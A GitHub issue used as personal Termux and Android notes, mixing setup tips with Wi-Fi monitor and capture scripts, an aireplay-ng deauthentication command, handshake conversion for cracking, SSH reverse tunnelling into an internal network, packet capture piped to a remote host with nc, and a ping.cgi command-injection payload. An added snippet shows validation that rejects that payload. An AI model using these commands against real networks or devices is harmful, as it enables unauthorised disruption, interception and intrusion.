shownb / shownb.github.com

shownb.github.io

termux aircrack & .... #39

Open shownb opened 5 years ago

shownb commented 5 years ago

Installing curl: if there is a problem, fix it with apt install libcurl --reinstall

On installing Python: this world really is split into two Pythons. https://wiki.termux.com/wiki/Python

tsudo nano /data/misc/wifi/wpa_supplicant.conf
svc wifi enable

Never run apt with root privileges. Already ran it? The fix is:

#restorecon -v -R /data/data/com.termux

tsu usage

PATH=$PATH:/sbin/su:/su/bin:/su/xbin:/system/bin:/system/xbin

Command to get the default DNS on Android

/system/bin/getprop net.dns1

Wi-Fi testing section

Wi-Fi monitor script

ip link set wlan0 down
ip link set wlan0 up
/system/bin/nexutil -d
/system/bin/nexutil -m2
LD_PRELOAD=/system/lib/libfakeioctl.so airodump-ng wlan0

Wi-Fi capture script

ip link set wlan0 down
ip link set wlan0 up
/system/bin/nexutil -d
/system/bin/nexutil -m2
LD_PRELOAD=/system/lib/libfakeioctl.so airodump-ng --ivs --bssid A1:A2:A3:A4:A5:A6 -w haha -c 1 wlan0

Wi-Fi: disconnect, disconnect, disconnect

LD_PRELOAD=/system/lib/libfakeioctl.so aireplay-ng --deauth 10 -a A1:A2:A3:A4:A5:A6 -c b1:b2:b3:b4:b5:b6 wlan0 

Convert ivs to the hashcat format

aircrack-ng -J new.hccap old.ivs

Reverse proxy: a speck of dust on the internal network

ssh -ngfNTR 7777:localhost:22 vpsuser@vpsip

My own machine

ssh -p 7777 -qngfNTD 1080 intranetuser@vpsip

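-f: run the ssh command in the background.
-g: allow remote hosts to connect to the host's forwarded port.
-T: disable pseudo-terminal allocation.
-n: redirect stdin to /dev/null (in effect, prevents reading from stdin).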

A simple FTP server in Python

from pyftpdlib.handlers import FTPHandler
from pyftpdlib.servers import FTPServer
from pyftpdlib.authorizers import DummyAuthorizer

class MyHandler(FTPHandler):

    def on_connect(self):
        print ("%s:%s connected" % (self.remote_ip, self.remote_port))

    def on_disconnect(self):
        # do something when client disconnects
        pass

    def on_login(self, username):
        # do something when user login
        pass

    def on_logout(self, username):
        # do something when user logs out
        pass

    def on_file_sent(self, file):
        # do something when a file has been sent
        print(self.username, file)
        pass

    def on_file_received(self, file):
        # do something when a file has been received
        print(self.username, file)
        pass

    def on_incomplete_file_sent(self, file):
        # do something when a file is partially sent
        print(self.username, file)
        pass

    def on_incomplete_file_received(self, file):
        # remove partially uploaded files
        import os
        os.remove(file)

def main():
    authorizer = DummyAuthorizer()
    authorizer.add_user('user', '12345', homedir='.', perm='elradfmwMT')
    authorizer.add_anonymous(homedir='.')

    handler = MyHandler
    handler.authorizer = authorizer
    server = FTPServer(('', 2121), handler)
    server.serve_forever()

if __name__ == "__main__":
    main()

Usage

ftpget -u user -p 12345 xxxx -P 2121 test.py

Run a command in the background

./c -c 1.1.1.1:8888 > log 2>&1 &

Remote packet capture

Capturing machine:
tcpdump -s 0 -i en0 not port 19191 -w - | nc remote_machine_ip 7777

Remote machine:
nc -l -p 7777 > dump.cap

ping command injection

ping.cgi?diagIntfT=ppp0&diagAddrT=8.8.8.8|whoami&diagTestTypeT=1&ippingversionT=4&repiNum=1&submit=1
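
The query string in the ping command injection note above carries a shell metacharacter inside diagAddrT. As an added example (not part of the original post and not any device's actual firmware), this is one way a handler could validate those fields and build an argv list so that no shell ever parses them. The function name, the interface allowlist, the count limit and the restriction to literal IP addresses are assumptions.

```python
import ipaddress
from urllib.parse import parse_qs

# Constructed sample: the query string quoted in the note above.
SAMPLE_QUERY = ("diagIntfT=ppp0&diagAddrT=8.8.8.8|whoami&diagTestTypeT=1"
                "&ippingversionT=4&repiNum=1&submit=1")

ALLOWED_INTERFACES = {"ppp0", "eth0", "br0"}  # assumption: known interface names
MAX_COUNT = 10                                # assumption: upper bound on echo requests


def build_ping_argv(query):
    """Validate every field and return an argv list; raise ValueError otherwise."""
    params = {k: v[0] for k, v in parse_qs(query).items()}

    version = params.get("ippingversionT", "")
    if version not in ("4", "6"):
        raise ValueError("bad IP version")

    # ip_address() accepts only a literal address, so "8.8.8.8|whoami" is
    # rejected as a whole instead of being stripped or escaped.
    addr = ipaddress.ip_address(params.get("diagAddrT", ""))
    if str(addr.version) != version:
        raise ValueError("address family does not match ippingversionT")

    iface = params.get("diagIntfT", "")
    if iface not in ALLOWED_INTERFACES:
        raise ValueError("unknown interface")

    count = params.get("repiNum", "")
    if not (count.isascii() and count.isdigit() and 1 <= int(count) <= MAX_COUNT):
        raise ValueError("bad count")

    # argv list for subprocess.run(argv, shell=False): each element reaches ping
    # as one argument and no shell interprets |, ;, $() or backticks.
    return ["ping", "-" + version, "-c", str(int(count)), "-I", iface, str(addr)]


if __name__ == "__main__":
    for q in (SAMPLE_QUERY, SAMPLE_QUERY.replace("|whoami", "")):
        try:
            print("accepted:", build_ping_argv(q))
        except ValueError as exc:
            print("rejected:", exc)
```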

shownb commented 5 years ago

dropbear configuration

mkdir /etc/dropbear/
dropbearkey -t rsa -f /etc/dropbear/dropbear_rsa_host_key
dropbear -p 8022